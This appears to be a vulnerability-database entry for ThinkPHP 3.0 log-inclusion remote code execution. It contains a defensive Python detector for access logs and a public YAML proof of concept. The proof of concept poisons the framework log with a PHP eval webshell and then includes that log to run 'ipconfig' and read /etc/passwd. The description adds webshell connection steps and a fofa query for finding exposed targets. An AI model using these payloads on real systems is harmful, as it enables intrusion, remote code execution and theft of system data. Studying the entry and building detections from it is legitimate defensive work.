thinkphp-3-0-log-rce: ThinkPHP 3.0 log remote command execution vulnerability

Date: 2025-09-01 | Affected software: ThinkPHP 3.0 | PoC: public

Vulnerability description

ThinkPHP is an open-source, lightweight PHP web application framework. In affected versions, if the first parameter of the template assignment method assign is controllable in application code, the template file path variable can be overwritten with the path of a file carrying attack code, resulting in arbitrary file inclusion and arbitrary code execution.
Connect with AntSword to obtain a webshell; the password is 1 (the log file name must be changed to today's date).
Debug mode off: http://x.x.x.x:23707/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/22_04_13.log
Debug mode on: http://x.x.x.x:23707/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/22_04_13.log
fofa-query: "thinkphp"
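The two request shapes the description identifies, a PHP tag smuggled into a query parameter (which lands in the framework's own log file) followed by a request that points value[_filename] at that log under Application/Runtime/Logs, are easy to spot in web-server access logs. The following detector is an added example written for this page, not code from the PoC or from the ThinkPHP project; it assumes Apache combined log format, and the sample lines are constructed.

```python
"""Flag ThinkPHP 3.x log-inclusion attempts in web-server access logs.

Added example for this page (not the page's PoC). Assumes Apache combined
log format; SAMPLE_LOG is constructed and not taken from a real server.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines: one benign request, one log-poisoning attempt
# (PHP tag in the m= parameter), two template-path overrides to a log file,
# and one more benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Sep/2025:10:00:01 +0000] "GET /index.php?m=Home&c=Index&a=index HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Sep/2025:10:00:02 +0000] "GET /index.php?m=--%3E%3C%3F%3D%24%7B%40print%28eval%28%24_POST%5B1%5D%29%29%7D%3F%3E HTTP/1.1" 404 1201 "-" "python-requests/2.31"
10.0.0.9 - - [01/Sep/2025:10:00:03 +0000] "POST /index.php?m=Home&c=Index&a=index&value%5B_filename%5D=./Application/Runtime/Logs/Common/25_09_01.log HTTP/1.1" 200 2048 "-" "python-requests/2.31"
10.0.0.7 - - [01/Sep/2025:10:00:04 +0000] "GET /index.php?m=Home&c=Index&a=index&value%5B_filename%5D=./Application/Runtime/Logs/Home/25_09_01.log HTTP/1.1" 200 2048 "-" "curl/8.0"
10.0.0.2 - - [01/Sep/2025:10:00:05 +0000] "GET /index.php?m=Admin&c=User&a=list&page=2 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Apache combined format: client ip, identd, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Template path redirected into the framework's own log directory
LOG_PATH_RE = re.compile(r'Runtime/Logs/.*\.log$', re.I)
# PHP open tag in a parameter name or value (log-poisoning payload)
PHP_TAG_RE = re.compile(r'<\?')


def classify_request(target):
    """Return the indicator names present in one request target (path + query)."""
    indicators = []
    # parse_qsl percent-decodes keys and values, so %5B_filename%5D becomes [_filename]
    for key, val in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if key.endswith('[_filename]') and LOG_PATH_RE.search(val):
            indicators.append('template_override_to_log')
        if PHP_TAG_RE.search(key) or PHP_TAG_RE.search(val):
            indicators.append('php_tag_in_query')
    return indicators


def scan_log(text):
    """Return one record per access-log line that carries at least one indicator."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        indicators = classify_request(m['target'])
        if indicators:
            hits.append({
                'ip': m['ip'],
                'method': m['method'],
                'status': int(m['status']),
                'indicators': indicators,
            })
    return hits


def correlate(hits):
    """Clients that both poisoned the log and then requested inclusion of a log file.

    Seeing both indicators from the same source is the high-confidence case;
    the inclusion request on its own still merits review.
    """
    seen = {}
    for h in hits:
        seen.setdefault(h['ip'], set()).update(h['indicators'])
    return {ip for ip, ind in seen.items()
            if {'php_tag_in_query', 'template_override_to_log'} <= ind}


if __name__ == '__main__':
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(h)
    print('poison + include from:', sorted(correlate(found)))
```

Run against a real access log by replacing SAMPLE_LOG with the file contents; the indicators are deliberately narrow (a PHP open tag in the query string, and a `[_filename]` key pointing into Runtime/Logs) so they produce few false positives on normal ThinkPHP traffic.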

PoC code [public]

id: thinkphp-3-0-log-rce

info:
  name: Thinkphp 3.0 log 远程命令执行漏洞
  author: daffainfo
  severity: critical
  verified: false
  description: |
         ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框架。该漏洞是在受影响的版本中,业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。
         蚁剑连接,得到一个webshell,密码为1(日志文件名需改为今天的日期)
         debug模式关闭:http://x.x.x.x:23707/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/22_04_13.log
         debug模式开启:http://x.x.x.x:23707/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/22_04_13.log
         fofa-query: "thinkphp"
  reference:
    - https://mp.weixin.qq.com/s/yuaJfZwr4ksstsW8nENoNA
set:
  logfilename: shortyear(0) + "_" + month(0) + "_" + day(0) + ".log"
rules:
  r0:
    request:
      method: GET
      path: /index.php?m=1
    expression: response.status == 404 && response.body.bcontains(b'ThinkPHP</a><sup>3.2.3</sup>')
  r1:
    request:
      method: GET
      path: /index.php?m=--><?=${@print(eval($_POST[1]))}?>
      headers:
        Cookie: PHPSESSID=t6drgq5cgde4caprfqv30joda0
        DNT: 1
    expression: response.status == 404 && response.body.bcontains(b'系统发生错误')  && response.headers["content-type"].contains("text/html")
  r2:
    request:
      method: POST
      path: /index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/{{logfilename}}
      body: "1=ipconfig"
    expression: response.status == 200 && response.body.bcontains(b'Windows IP')
  r3:
    request:
      method: POST
      path: /index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/{{logfilename}}
      body: "1=ipconfig"
    expression: response.status == 200 && response.body.bcontains(b'Windows IP')
  r22:
    request:
      method: POST
      path: /index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/{{logfilename}}
      body: "1=cat+/etc/passwd"
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
  r33:
    request:
      method: POST
      path: /index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/{{logfilename}}
      body: "1=cat+/etc/passwd"
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: (r0() && r1() && r2()) || (r0() && r1() && r3()) || (r0() && r1() && r22()) || (r0() && r1() && r33())
